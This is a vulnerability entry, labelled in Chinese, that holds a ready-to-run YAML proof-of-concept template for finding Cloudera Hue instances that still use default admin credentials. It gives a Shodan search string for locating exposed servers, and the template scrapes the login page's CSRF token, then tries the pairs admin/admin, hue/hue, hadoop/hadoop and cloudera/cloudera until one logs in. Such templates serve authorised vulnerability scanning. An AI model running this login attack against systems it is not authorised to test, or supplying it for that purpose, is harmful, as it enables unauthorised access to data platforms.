漏洞描述
Cloudera Hue default admin credentials were discovered.
SHODAN: title:"Hue - Welcome to Hue"
hue-default-credential: Cloudera Hue Default Admin Login
PoC代码[已公开]
id: hue-default-credential
info:
name: Cloudera Hue Default Admin Login
author: For3stCo1d
severity: high
verified: false
description: |
Cloudera Hue default admin credentials were discovered.
SHODAN: title:"Hue - Welcome to Hue"
reference:
- https://github.com/cloudera/hue
tags: hue,default-login,oss,cloudera
created: 2023/06/24
rules:
r0:
request:
method: GET
path: /hue/accounts/login?next=/
expression: response.body.ibcontains(b'welcome to hue') && response.body.bcontains(b'csrfmiddlewaretoken')
output:
search: |
"name='csrfmiddlewaretoken' value='(?P<token>.+?)'".bsubmatch(response.body)
token: search["token"]
r1:
request:
method: POST
path: /hue/accounts/login
body: csrfmiddlewaretoken={{token}}&username=admin&password=admin&next=%2F
follow_redirects: true
expression: response.status == 200 && response.body.ibcontains(b'<title>Hue</title>')
stop_if_match: true
r2:
request:
method: POST
path: /hue/accounts/login
body: csrfmiddlewaretoken={{token}}&username=hue&password=hue&next=%2F
follow_redirects: true
expression: response.status == 200 && response.body.ibcontains(b'<title>Hue</title>')
stop_if_match: true
r3:
request:
method: POST
path: /hue/accounts/login
body: csrfmiddlewaretoken={{token}}&username=hadoop&password=hadoop&next=%2F
follow_redirects: true
expression: response.status == 200 && response.body.ibcontains(b'<title>Hue</title>')
stop_if_match: true
r4:
request:
method: POST
path: /hue/accounts/login
body: csrfmiddlewaretoken={{token}}&username=cloudera&password=cloudera&next=%2F
follow_redirects: true
expression: response.status == 200 && response.body.ibcontains(b'<title>Hue</title>')
stop_if_match: true
expression: r0() && (r1() || r2() || r3() || r4())